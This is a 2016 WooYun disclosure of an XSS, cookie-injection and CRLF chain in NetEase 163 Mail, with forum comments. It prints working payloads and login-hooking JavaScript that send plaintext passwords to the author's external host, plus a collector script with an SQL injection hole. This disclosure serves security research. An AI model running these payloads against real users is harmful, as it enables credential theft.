当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167493

漏洞标题:一个可大规模隐蔽窃取163邮箱用户密码的漏洞(无需点击)

相关厂商:网易

漏洞作者: wolf

提交时间:2016-01-05 15:12

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

163邮箱XSS rookit 用户无需特意打开攻击链接,上网过程中可能就被窃取明文账号密码。

详细说明:

分析mail.163.com 整个流程页面中输出cookie的地方
发现首页历史记录为输出cookie nts_mail_user的值
构造测试
根据其生成格式,修改cookie nts_mail_user的值为<img>:-1:1

echo_test.jpg


可看到页面会输出其内容

搜索分析输出点.jpg


分析此处为innerHTML的xss,可采用<img>标签来执行js脚本
构造测试
修改cookie nts_mail_user的值为<img src=1 onerror=alert(1)>:-1:1

img_test_alert.jpg


成功触发
继续修改让其执行远端的js文件

<img src=1 onerror="with(document)body.appendChild(createElement('script')).src='//txt888.sinaapp.com/test.js?31'">:-1:1


img_eval_urljs.jpg


成功载入执行了我们远端自定义的js
此处已类似 http://wooyun.org/bugs/wooyun-2010-0127985 提到的问题
如何构造设置cookie呢,根据文中所说,我们可以使用xss来设置
这里神器伏宸自动化渗透测试平台已扫描出多个163.com域名下的反射型xss漏洞,提取一个测试一下。
构造

http://m.auto.163.com/title/compare/000BNOUZ,000BNeDG,000BWPNE.html?type=selectseries"><script src="//txt888.sinaapp.com/js.js"></script>&series_name=%E5%A5%94%E9%A9%B0G%20AMG&series_id=16354&first=true


js.js内容

function fSetCookie(c, e, d) {
    var a = ";domain=" + d +";path=/" ;
    document.cookie = c + "=" + e + a + ";expires=" + new Date(2099, 12, 31).toGMTString();
}
fSetCookie("nts_mail_user","<img src=1 onerror=\"with(document)body.appendChild(createElement('script')).src='//txt888.sinaapp.com/test.js?31'\">:-1:1",".163.com")


xss_set_cookie_ok.jpg


xss_set_cookie_good_alert.jpg


成功利用xss设置攻击cookie并触发
现在如何截取用户名密码呢
在wooyun zone搜索了下 有很多办法以及长短短的xss.js。
这里为了方便,采用的是给表单增加onsubmit的方式
拦截登录js代码

function login_1(){
    a = new Image();
    a.src = "http://txt888.sinaapp.com/form_save.php?user=" + document.getElementById("idInput").value + "&password=" + document.getElementById("pwdInput").value; 
    window.location.href=window.location.href;
    return true;
}
document.getElementById("idInput").value=""; //设置历史用户名为空,不设置为那一串攻击代码,修改防止露馅。
document.getElementById('idInputTest').innerHTML = '';
document.getElementById("login163").setAttribute("onsubmit","login_1();");//给登录框添加onsubmit事件
fSetCookie("nts_mail_user",document.getElementById("idInput").value + ":-1:0");//复原


http://txt888.sinaapp.com/form_save.php为保存截取账户信息页面
form_save.php 代码

<?php
function insert($data){
    $mysql = new SaeMysql();
    $sql = "insert into 163_test(`data`,`time`) values('$data',now())";
    $mysql->runsql($sql);
    $mysql->closeDb();
    if ($mysql->errno() != 0){
    	die("Error:" . $mysql->errmsg());
	}
}
if (count($_GET)>=1){
    $data = json_encode($_GET);
	insert($data);
    echo 1;
}
?>


测试
访问

http://m.auto.163.com/title/compare/000BNOUZ,000BNeDG,000BWPNE.html?type=selectseries"><script 
src="//txt888.sinaapp.com/js.js?555"></script>&series_name=%E5%A5%94%E9%A9%B0G%20AMG&series_id=16354&first=true


good_1.jpg


再访问mail.163.com登录

good_2.jpg


输入用户名密码登录

good_3.jpg


成功截取到明文用户名密码。
到这里就结束了吗,no!
这种攻击方式需要受害者访问我们的链接,成功率低,而且太明显。
怎么让受害者无需点击我们的链接,不知不觉中被窃取呢
这里就要用到一种比较少被提到的漏洞 —— CRLF
详情可看phith0n牛的文章介绍 http://drops.wooyun.org/papers/2466
这里神器伏宸自动化渗透测试平台也已找出多个CRLF漏洞,拿一个测试
访问

http://reg.163.com/reg/reg.jsp?locale=cn_ZH%0aset-cookie:test%3d123123&product=rms&url=http://art.campus.163.com/applyJob.do?lan=zh&loginurl=http://art.campus.163.com/applyJob.do?lan=zh


crlf_test.jpg


可以看到set了我们一个自定义的cookie值,并且域为根域名,可直接提供给mail.163.com使用
构造

http://reg.163.com/reg/reg.jsp?locale=cn_ZH%0aset-cookie:nts_mail_user%3d%3Cimg%20src%3D1%20onerror%3D%22with%28document%29body.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2ftxt888.sinaapp.com%2frookit.js%3F31%27%22%3E%3A-1%3A1;&product=rms&url=http://art.campus.163.com/applyJob.do?lan=zh&loginurl=http://art.campus.163.com/applyJob.do?lan=zh


crlf_daxie.jpg


这里nts_mail_user 的nts被转换为大写了,不知为何,如何绕过呢。
增加空格%20试试

http://reg.163.com/reg/reg.jsp?locale=cn_ZH%0aset-cookie:%20nts_mail_user%3d%3Cimg%20src%3D1%20onerror%3D%22with%28document%29body.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2ftxt888.sinaapp.com%2frookit.js%3F31%27%22%3E%3A-1%3A1;&product=rms&url=http://art.campus.163.com/applyJob.do?lan=zh&loginurl=http://art.campus.163.com/applyJob.do?lan=zh


crlf_ok.jpg


访问查看 这里成功添加了_nts_mail_user 不再出现大写,但多了个下划线,怎么办呢,经过测试,下划线并不影响其程序获取(不知为何,难道是BUG或者是其程序获取cookie的姿势有问题)。
再访问mail.163.com试试

crlf_mail_ok.jpg


确定_nts_mail_user可被使用
构造:

<img src="//reg.163.com/reg/reg.jsp?locale=cn_ZH%0aset-cookie:%20nts_mail_user%3d%3Cimg%20src%3D1%20onerror%3D%22with%28document%29body.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2ftxt888.sinaapp.com%2frookit.js%3F31%27%22%3E%3A-1%3A1;&product=rms&url=http://art.campus.163.com/applyJob.do?lan=zh&loginurl=http://art.campus.163.com/applyJob.do?lan=zh">


访问测试

crlf_img_test.jpg


成功添加cookie
也就是说只要能插入访问外部网络资源的地方就可以插入攻击代码(图片,视频,flash等等),在受害者上网过程中不知不觉中就被窃取账号密码。
测试
例如DZ的论坛
添加网络图片 地址填 

http://reg.163.com/reg/reg.jsp?locale=cn_ZH%0aset-cookie:%20nts_mail_user%3d%3Cimg%20src%3D1%20onerror%3D%22with%28document%29body.appendChild%28createElement%28%27script%27%29%29.src%3D%27%2f%2ftxt888.sinaapp.com%2frookit.js%3F31%27%22%3E%3A-1%3A1;&product=rms&url=http://art.campus.163.com/applyJob.do?lan=zh&loginurl=http://art.campus.163.com/applyJob.do?lan=zh#.jpg


crlf_dz_ok.jpg


测试访问,成功添加cookie
这里园长MM客串一下,作为一个普通用户正常查看帖子
后其登录163邮箱

163_ok.jpg


163_login.jpg


整理:攻击流程,在社交论坛,贴吧,空间等可添加外部资源的地方插入攻击代码(图片),受害者在正常使用论坛查看帖子或其他无意中触发攻击代码,触发后其下次登录163邮箱时用户名密码将会被截取发动至攻击者指定的地址中。

漏洞证明:

修复方案:

版权声明:转载请注明来源 wolf@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-06 21:29

厂商回复:

该漏洞已修复,白帽子漏洞细节描述非常清楚,对一些中低危漏洞的利用非常巧妙,给我们在业务安全上提供了很好的思路与经验,非常感谢!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-05 15:14 | socket ( 实习白帽子 | Rank:35 漏洞数:13 | )

    前排卖瓜子

  2. 2016-01-05 15:15 | Zhe ( 普通白帽子 | Rank:1232 漏洞数:301 | 我是来看看有没有年终礼物的)

    卖雨伞

  3. 2016-01-05 15:17 | Observer ( 实习白帽子 | Rank:35 漏洞数:9 )

    @socket 瓜子怎么卖的?

  4. 2016-01-05 15:19 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    这么叼

  5. 2016-01-05 15:19 | 我的邻居王婆婆 ( 普通白帽子 | Rank:2981 漏洞数:505 | 刚发现个好洞网站就挂了)

    火钳刘明

  6. 2016-01-05 15:19 | 进击的zjx ( 普通白帽子 | Rank:1465 漏洞数:179 | 1000rank目标达成!撒花……)

    我擦!

  7. 2016-01-05 15:22 | feiyu ( 普通白帽子 | Rank:103 漏洞数:25 )

    m

  8. 2016-01-05 15:22 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河 为你放弃世界有何不可)

    火钳刘明

  9. 2016-01-05 15:24 | 随风的风 ( 普通白帽子 | Rank:205 漏洞数:72 | 微信公众号:233sec 不定期分享各种漏洞思...)

    留名

  10. 2016-01-05 15:24 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:430 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    前排出售广告位!!!!!CCTV看这里!!

  11. 2016-01-05 15:26 | 0x 80 ( 普通白帽子 | Rank:1559 漏洞数:449 | 某安全公司招聘渗透测试工程师,具备3-5年...)

    前排

  12. 2016-01-05 15:30 | ( 路人 | Rank:30 漏洞数:2 | 一个正经的JAVA程序猿)

    前排~

  13. 2016-01-05 15:31 | AK-47 ( 实习白帽子 | Rank:51 漏洞数:7 | 开开心心挖洞,踏踏实实上学!)

    什么情况?腾讯、网易……

  14. 2016-01-05 15:34 | 云袭2001 ( 普通白帽子 | Rank:106 漏洞数:27 | 不努力的菜鸟)

    66666666

  15. 2016-01-05 15:38 | Seven.Sea ( 普通白帽子 | Rank:118 漏洞数:28 | 唯有安全与美食不可辜负。)

    噗。wolf大哥 66666666666

  16. 2016-01-05 15:41 | webshell ( 实习白帽子 | Rank:62 漏洞数:19 | hello word.)

    膜拜wolf大哥。。。。。。6666666666666666666666

  17. 2016-01-05 15:44 | 毛泽车 ( 路人 | Rank:27 漏洞数:9 | 同志们,安全,是要全国人民一起努力的,奋...)

    黑客

  18. 2016-01-05 15:45 | chinakid ( 实习白帽子 | Rank:38 漏洞数:13 )

    火钳刘明

  19. 2016-01-05 15:48 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    我要告你偷了我的密码!

  20. 2016-01-05 15:51 | Fire ant ( 实习白帽子 | Rank:93 漏洞数:31 | 他们回来了................)

    打雷必须关注

  21. 2016-01-05 15:55 | thewind ( 普通白帽子 | Rank:149 漏洞数:37 | 小白……)

    围观

  22. 2016-01-05 15:56 | px1624 ( 普通白帽子 | Rank:1074 漏洞数:181 | px1624)

    来来来,请偷我密码。

  23. 2016-01-05 16:07 | Mieless ( 实习白帽子 | Rank:35 漏洞数:10 | 我是来打酱油的。)

    66666

  24. 2016-01-05 16:10 | just_joker ( 实习白帽子 | Rank:77 漏洞数:18 | ..........)

    这样的话,还有年终奖吗

  25. 2016-01-05 16:17 | timego ( 实习白帽子 | Rank:66 漏洞数:6 | 专业小白帽)

    网易要开撕吗?

  26. 2016-01-05 16:22 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    66666

  27. 2016-01-05 16:23 | 祸斗 ( 路人 | Rank:10 漏洞数:1 | 静下来…)

    又是网易。。

  28. 2016-01-05 16:24 | px1624 ( 普通白帽子 | Rank:1074 漏洞数:181 | px1624)

    WooYun: 【乌云峰会】网易邮箱XSS ROOKIT

  29. 2016-01-05 16:24 | komas ( 实习白帽子 | Rank:51 漏洞数:16 )

    关注

  30. 2016-01-05 16:39 | Submit ( 普通白帽子 | Rank:526 漏洞数:118 | 我在乌云等你哟)

    估计网易不服气

  31. 2016-01-05 16:47 | Gabriel ( 实习白帽子 | Rank:77 漏洞数:23 )

    网易又要上头条

  32. 2016-01-05 16:48 | Whysec ( 路人 | Rank:20 漏洞数:7 )

    CCTV看这里

  33. 2016-01-05 16:49 | 坏男孩-A_A ( 路人 | Rank:28 漏洞数:11 | 膜拜学习中)

    擦。。又出事了

  34. 2016-01-05 16:53 | kav ( 路人 | Rank:16 漏洞数:8 )

    又是网易,这次不知道又有什么理由

  35. 2016-01-05 16:54 | boy ( 路人 | Rank:0 漏洞数:1 | 酱油选手)

    要上电视了,好激动。。

  36. 2016-01-05 16:57 | scanf ( 核心白帽子 | Rank:1380 漏洞数:199 | 。)

    又被搞了 wolf牛赞一个

  37. 2016-01-05 16:59 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    marker

  38. 2016-01-05 17:00 | an0nym0u5 ( 普通白帽子 | Rank:304 漏洞数:47 )

    围观~~

  39. 2016-01-05 17:05 | RocIl ( 路人 | Rank:22 漏洞数:2 | 少说多看。)

    坐着、、、

  40. 2016-01-05 17:07 | hecate ( 普通白帽子 | Rank:743 漏洞数:113 | ®高级安全工程师 | WooYun认证√)

    后排爆前面的菊花

  41. 2016-01-05 17:11 | N0Hacker ( 路人 | Rank:8 漏洞数:2 | N0Hacker)

    火钳留名

  42. 2016-01-05 17:13 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | 乌云指定IDC)

    网易又要上头条

  43. 2016-01-05 17:14 | bigx ( 普通白帽子 | Rank:185 漏洞数:45 | cisp cissp cisa ncie 乌云...)

    留名

  44. 2016-01-05 17:23 | 猴子搬来的救兵 ( 路人 | 还没有发布任何漏洞 | 专注于Android平台漏洞发现)

    网易已经漏洞百孔了。

  45. 2016-01-05 17:24 | 路人转黑 ( 路人 | Rank:14 漏洞数:3 | -。-)

    一会儿又变某邮箱了

  46. 2016-01-05 17:34 | phantom0307 ( 普通白帽子 | Rank:127 漏洞数:37 | Night time sharpensHeightens each sens...)

    没赶上前排~

  47. 2016-01-05 18:03 | s4cr00t ( 实习白帽子 | Rank:32 漏洞数:7 | 自由,共享,平等)

    我擦,又是网易。

  48. 2016-01-05 18:04 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2970 漏洞数:585 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    6666

  49. 2016-01-05 18:08 | socket ( 实习白帽子 | Rank:35 漏洞数:13 | )

    @Observer 一斤8元 (:

  50. 2016-01-05 18:11 | 小博博 ( 实习白帽子 | Rank:80 漏洞数:14 | 工作)

    网易:还能让我好好过个年吗?

  51. 2016-01-05 18:16 | 奈何彼岸 ( 实习白帽子 | Rank:51 漏洞数:22 | 乌云一下你就知道)

    666

  52. 2016-01-05 18:17 | 行侠 ( 实习白帽子 | Rank:70 漏洞数:26 )

    我猜密码登录框XSS

  53. 2016-01-05 18:25 | cwkiller ( 路人 | Rank:18 漏洞数:8 | cwkiller)

    网易头条会报道吗?

  54. 2016-01-05 18:30 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  55. 2016-01-05 18:33 | 表哥 ( 实习白帽子 | Rank:42 漏洞数:11 | 他依然帅气。)

    66666666

  56. 2016-01-05 18:38 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    多种技巧的结合啊

  57. 2016-01-05 18:44 | 孤零落叶寒 ( 普通白帽子 | Rank:177 漏洞数:26 | 今天的跌倒是是为了明天更好的站着)

    厉害啊

  58. 2016-01-05 18:51 | 小苹果 ( 实习白帽子 | Rank:74 漏洞数:19 | 只要锄头挥的好,哪有洞挖不到)

    牛逼啊,又学会一种啊D的渗透姿势

  59. 2016-01-05 18:51 | 403 ( 普通白帽子 | Rank:148 漏洞数:13 | 求收编!)

    坐看乌云大战网易

  60. 2016-01-05 18:53 | 禽兽放开那妹子 ( 路人 | Rank:18 漏洞数:8 | 本屌就是传说中的天下第一帅逼)

    坐看乌云反被打脸

  61. 2016-01-05 19:02 | 诚殷的小白帽 ( 实习白帽子 | Rank:44 漏洞数:25 )

    幸好社工阔不在

  62. 2016-01-05 19:15 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

    吃惊

  63. 2016-01-05 19:22 | Mark0smith ( 普通白帽子 | Rank:106 漏洞数:41 )

    后排围观

  64. 2016-01-05 19:27 | onpu ( 普通白帽子 | Rank:167 漏洞数:37 )

    火钳刘能

  65. 2016-01-05 19:36 | Aasron ( 普通白帽子 | Rank:208 漏洞数:59 | 工欲善其事,必先利其器)

    要上天

  66. 2016-01-05 19:43 | ksss ( 普通白帽子 | Rank:560 漏洞数:84 | 近乖者乖,近坏者坏)

    窜天猴大队

  67. 2016-01-05 20:04 | 青空 ( 路人 | Rank:9 漏洞数:1 | 向各位学习、致敬。)

    这回我看要火

  68. 2016-01-05 20:12 | 黑吃黑 ( 普通白帽子 | Rank:147 漏洞数:31 | 古今多少事,都付笑谈中。)

    我决定不再用网易

  69. 2016-01-05 20:13 | 动感超人 ( 实习白帽子 | Rank:46 漏洞数:11 | 小心动感光波)

    要火,我先留言,

  70. 2016-01-05 20:35 | FK_T ( 路人 | Rank:2 漏洞数:2 | 乌云我来了…………)

    666666

  71. 2016-01-05 21:04 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    坐等渣浪小编

  72. 2016-01-05 21:17 | Rainism ( 路人 | Rank:11 漏洞数:3 | hacking for fun)

    6666

  73. 2016-01-05 21:18 | secart ( 路人 | Rank:27 漏洞数:5 | 这个人很懒,什么都没留。)

    坐等小编

  74. 2016-01-05 21:20 | 米怀特 ( 路人 | Rank:4 漏洞数:1 | 安全真的安全么?)

    坐等163各种解释。呵呵我这样的评论163能看到?

  75. 2016-01-05 21:37 | 路人毛 ( 实习白帽子 | Rank:64 漏洞数:25 | ../)

    网易说 他妈的老子跟你是过不去咋地?

  76. 2016-01-05 21:39 | C木苦咖啡 ( 路人 | Rank:26 漏洞数:7 | 纯属娱乐)

    被电了

  77. 2016-01-05 22:18 | Yosef ( 实习白帽子 | Rank:63 漏洞数:17 | 苦逼程序猿一枚)

    后排留名 网易不服

  78. 2016-01-05 22:20 | Can ( 实习白帽子 | Rank:71 漏洞数:22 | 天地不仁 以万物为刍狗)

    我日,好屌

  79. 2016-01-05 22:33 | tangtanglove ( 路人 | Rank:9 漏洞数:5 | 一个对安全感兴趣的屌丝phper)

    坐等

  80. 2016-01-05 23:14 | hellokuku ( 普通白帽子 | Rank:110 漏洞数:35 | 刷水题ing)

    关注

  81. 2016-01-05 23:30 | Sakura丶小樱 ( 路人 | Rank:4 漏洞数:2 | poi?)

    前排卖避孕套/跳蛋/自*器/飞*杯

  82. 2016-01-06 08:11 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    666来晚了

  83. 2016-01-06 08:27 | tangtanglove ( 路人 | Rank:9 漏洞数:5 | 一个对安全感兴趣的屌丝phper)

    我最近也在研究网易邮箱,他把事件全部都替换了!(onerror替换成on_error)把表单也过滤了,现在有一个思路就是在邮箱里构建一个隐藏的表单,表单的名称和邮箱的登录表单名称保持一致,这样如果有浏览器记住密码的话,会自动把表单填上,然后诱惑用户点击提交表单。不知可行不。

  84. 2016-01-06 09:43 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    叼。。。。

  85. 2016-01-06 10:15 | 暴走 ( 普通白帽子 | Rank:454 漏洞数:88 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    我来晚了!

  86. 2016-01-06 11:07 | 中国Cold ( 路人 | Rank:8 漏洞数:5 | 服重任,行远道,正直而固者,轴也。)

    警察叔叔就是他

  87. 2016-01-06 19:51 | 酷帥王子 ( 普通白帽子 | Rank:236 漏洞数:64 | 天人合一,乃屌神也!)

    屌屌的

  88. 2016-01-06 21:38 | qglfnt ( 普通白帽子 | Rank:158 漏洞数:37 | 白天不懂夜的黑)

    火钳刘明!!

  89. 2016-01-06 22:22 | 坏男孩-A_A ( 路人 | Rank:28 漏洞数:11 | 膜拜学习中)

    @tangtanglove 直接整个隐藏,进行隐藏提交不能么?

  90. 2016-01-06 22:29 | 小不点 ( 核心白帽子 | Rank:1140 漏洞数:120 | 生命不息,刷洞不止.....)

    wolf牛 66666

  91. 2016-01-07 09:03 | tangtanglove ( 路人 | Rank:9 漏洞数:5 | 一个对安全感兴趣的屌丝phper)

    @坏男孩-A_A 你是说脚本自动提交?个人觉得脚本比较难绕过

  92. 2016-01-07 09:05 | _Evil ( 普通白帽子 | Rank:418 漏洞数:60 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    林老板 666

  93. 2016-01-07 09:09 | DNS ( 普通白帽子 | Rank:711 漏洞数:73 | root@qisec.com)

    林老板666

  94. 2016-01-07 09:28 | hkAssassin ( 普通白帽子 | Rank:377 漏洞数:70 | 我是一只毛毛虫。)

    修复了就赶紧公开啊!

  95. 2016-01-07 10:16 | 坏男孩-A_A ( 路人 | Rank:28 漏洞数:11 | 膜拜学习中)

    @tangtanglove 既然都能弄进取表单,还是有可能自动提交的

  96. 2016-01-07 10:51 | tangtanglove ( 路人 | Rank:9 漏洞数:5 | 一个对安全感兴趣的屌丝phper)

    @坏男孩-A_A 没有js,不能提交

  97. 2016-01-07 11:05 | wolf ( 普通白帽子 | Rank:112 漏洞数:10 | wolf@伏宸安全团队)

    @DNS 你是…

  98. 2016-01-07 15:04 | Sai、 ( 路人 | Rank:8 漏洞数:2 | for fun……)

    惊了个呆

  99. 2016-01-07 21:59 | 坏男孩-A_A ( 路人 | Rank:28 漏洞数:11 | 膜拜学习中)

    @tangtanglove 没有js机的可以提交的,可以利用163本身的一些js啊

  100. 2016-01-16 23:06 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1296 漏洞数:131 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    好屌的思路

  101. 2016-01-16 23:24 | 坏男孩-A_A ( 路人 | Rank:28 漏洞数:11 | 膜拜学习中)

    @子非海绵宝宝 是发邮件的地方灭?

  102. 2016-01-25 21:12 | 梧桐雨 认证白帽子 ( 普通白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)

    精彩!

  103. 2016-01-26 21:53 | 小杰哥 ( 普通白帽子 | Rank:211 漏洞数:33 | 逆水行舟,不进则退。)

    @wolf 楼主 你这代码写的也太6了吧!多注意自己的裤子啊!current user: 'kzm24nn4jw@10.%'current database: 'app_txt888'<img src="/upload/201601/26215257ccf58c22da406bdf031cb6271c94ccd5.png" alt="SQL.png" />

  104. 2016-01-26 22:15 | wolf ( 普通白帽子 | Rank:112 漏洞数:10 | wolf@伏宸安全团队)

    @小杰哥 sea测试代码就不纠结啦 不过貌似泄露了些什么=。=

  105. 2016-01-26 22:16 | 梧桐雨 认证白帽子 ( 普通白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)

    @wolf 目测正在提交漏洞,把内容也复制过来了。。哈哈

  106. 2016-01-26 22:17 | 小杰哥 ( 普通白帽子 | Rank:211 漏洞数:33 | 逆水行舟,不进则退。)

    @wolf 私信了你 你还是改改吧 不然一会一堆人在玩...

  107. 2016-01-26 22:24 | wolf ( 普通白帽子 | Rank:112 漏洞数:10 | wolf@伏宸安全团队)

    @小杰哥 好 谢谢了

  108. 2016-01-26 22:27 | wolf ( 普通白帽子 | Rank:112 漏洞数:10 | wolf@伏宸安全团队)

    @梧桐雨 不是 那是我那个接收测试文件的注入图,写的时候就知道了=。=,原想先留着方便测试人员测试。然后忘记删掉了。

  109. 2016-01-26 22:42 | 梧桐雨 认证白帽子 ( 普通白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)

    @wolf soga~

  110. 2016-01-26 23:52 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student at THU.)

    这个神器是厉害啊!

  111. 2016-01-26 23:55 | 大亮 ( 普通白帽子 | Rank:333 漏洞数:67 | 慢慢挖洞)

    伏宸扫描器这么6啊,随便就是什么漏洞

  112. 2016-01-27 15:44 | bigx ( 普通白帽子 | Rank:185 漏洞数:45 | cisp cissp cisa ncie 乌云...)

    关注~~~~

  113. 2016-01-29 11:28 | Dream maker ( 路人 | Rank:4 漏洞数:1 | 一个天然呆萌的小二货)

    后排打麻将一缺三

  114. 2016-02-02 16:28 | 苏安泽 ( 普通白帽子 | Rank:130 漏洞数:34 | 一个想成为演员的黑客~)

    这分析的很好,赞一个。、666